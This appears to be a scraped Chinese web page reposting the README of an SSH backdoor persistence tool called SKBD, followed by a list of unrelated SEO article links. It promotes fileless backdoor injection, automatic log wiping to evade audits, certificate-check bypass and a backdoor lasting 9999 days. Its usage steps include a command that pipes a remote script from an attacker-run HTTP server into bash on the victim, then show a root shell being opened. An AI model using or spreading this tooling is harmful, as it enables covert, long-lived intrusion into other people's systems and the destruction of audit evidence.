当前位置: 首页 > wzjs >正文

秦皇岛网站建设公司河北百度推广客服电话

秦皇岛网站建设公司,河北百度推广客服电话,可以查授权的网站怎么做,mathilda wordpress其他工具: Tyran(暴君) 后渗透持久化控制 地址:https://github.com/MartinxMax/tyrant SKBD (Scorpion-Killer) 地址:https://github.com/MartinxMax/skbd Linux-SSH后门注入持久化控制工具 无文件保存自动化后门注入 使用curl请求,该工具能够自动执行后门注入操作…

其他工具: Tyran(暴君) 后渗透持久化控制

地址:https://github.com/MartinxMax/tyrant

4bd70646a60cef5503b218fde4e1960.jpg

SKBD (Scorpion-Killer)

地址:https://github.com/MartinxMax/skbd

logo.png

Linux-SSH后门注入持久化控制工具

  1. 无文件保存自动化后门注入
    使用curl请求,该工具能够自动执行后门注入操作,而不会在系统上留下任何显著的痕迹。

  2. 自动痕迹日志清理
    在后门注入过程中,该工具能够自动清除相关日志和痕迹,确保在监控和审计过程中不会触发警报。

  3. CA证书绕过监测
    通过利用CA证书机制,该工具能够绕过SSH服务器证书验证检查,进一步增强隐蔽性和持久性。

  4. 27年期限SSH后门
    注入的SSH后门最多可持续27年(9999天),确保长期访问和控制系统。

  5. 多个无密码用户的SSH登录
    支持多个SSH用户独立登录,且不需要密码,提高了灵活性和隐蔽性。

  6. 可移植性与数据迁移
    该工具允许将machines中的所有文件打包并发送给其他用户,支持无缝迁移,实现跨系统部署控制。


使用方法

PS:此脚本必须以ROOT权限执行。

skbd.py : 服务端 (API)

$ python3 skbd.py -h

image.png

skbdexec.py : 服务端 (命令执行)

$ python3 skbdexec.py

image-1.png

skbd.sh : 客户端 (载入skbd后门)

$ ./skbd.sh

image-2.png


示例:

  1. 启动恶意HTTP服务器

$ python3 -m http.server 8181

image-4.png

  1. 启动服务端 (API):

$ python3 skbd.py

image-5.png

endpoint: https://192.168.0.115:9191

  1. 启动服务端 (命令执行):
    PSskbdexec.py可以随时启动。

$ python3 skbdexec.py

image-6.png

  1. 向客户端注入skbd后门

$ curl http://<IP>:<PORT>/skbd.sh|bash -s -- -e 'https://<IP>:PORT'

image-3.png

  1. 在服务端(命令执行)访问客户端Shell:

SKBD # info

image-7.png

SKBD # use 1

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# show

image-8.png

+-------------------------------------------+-------------------------------------------+
| Configuring Machine: f6b50eecbeca4b61a7e8932c3e9cf9f2    |
+-------------------------------------------+-------------------------------------------+
| Parameter          | Value                            |
+-------------------------------------------+-------------------------------------------+
| users              | root,postgres,map                 | (Editable) |
| ips                | 192.168.0.111,                    | (Editable) |
| sn                 | f6b50eecbeca4b61a7e8932c3e9cf9f2  | (Editable) |
+-------------------------------------------+-------------------------------------------+

此列表显示了客户端可进行SSH登录的用户(root,postgres,map)。可以通过使用命令set user map来更改已登录的用户会话。

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# set user root

最终的登录参数:

+-------------------+-------------------+
| user: root        |
| ip: 192.168.0.111 |
| port: 22          |
+-------------------+-------------------+

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# run

image-9.png

http://www.dtcms.com/wzjs/440812.html

相关文章:

  • 聊城做网站公司如何做网站推广广告
  • 有没有做美食的网站整合网络营销
  • 做采集网站赚钱识图
  • 微信网站如何做镇江交叉口优化
  • 英文外贸网站制作论坛如何做seo
  • 用明星名字做网站个人网站建站教程
  • 南京seo优化公司手机优化
  • wordpress 加速乐苏州seo关键词优化排名
  • 镇江市网站建设武汉刚刚发生的新闻
  • 一起做网店一件代发网魔贝课凡seo
  • 手机网站建设和电商网站设计
  • 佛山网站制作网站设计网络seo排名
  • 网页制作模板的网站免费销售培训课程一般有哪些
  • jsp网站 iis郑州seo技术外包
  • 做商业网站要交税吗网络推广公司经营范围
  • 如何做企业网站开发百度注册入口
  • 韩城网站建设刷赞网站推广空间免费
  • 冠县哪做网站公司网站建设推广
  • 长沙有实力的关键词优化价格seo关键词优化排名公司
  • 免费空间最大的网盘seo关键词优化推广
  • 郑州网站建设企起网站下载
  • 做建网站的公司项目外包平台
  • 日照网站建设aso优化排名推广
  • 怎么做公司的宣传网站自媒体推广平台
  • 西青做网站汕头网站排名优化
  • 杨凯做网站山东泰安网络推广
  • 电脑怎么下免费wordpressseo服务合同
  • 营销网站建设服务做推广的技巧
  • 做分销网站关键词优化排名网站
  • 网站建设模板坏处湖南seo网站多少钱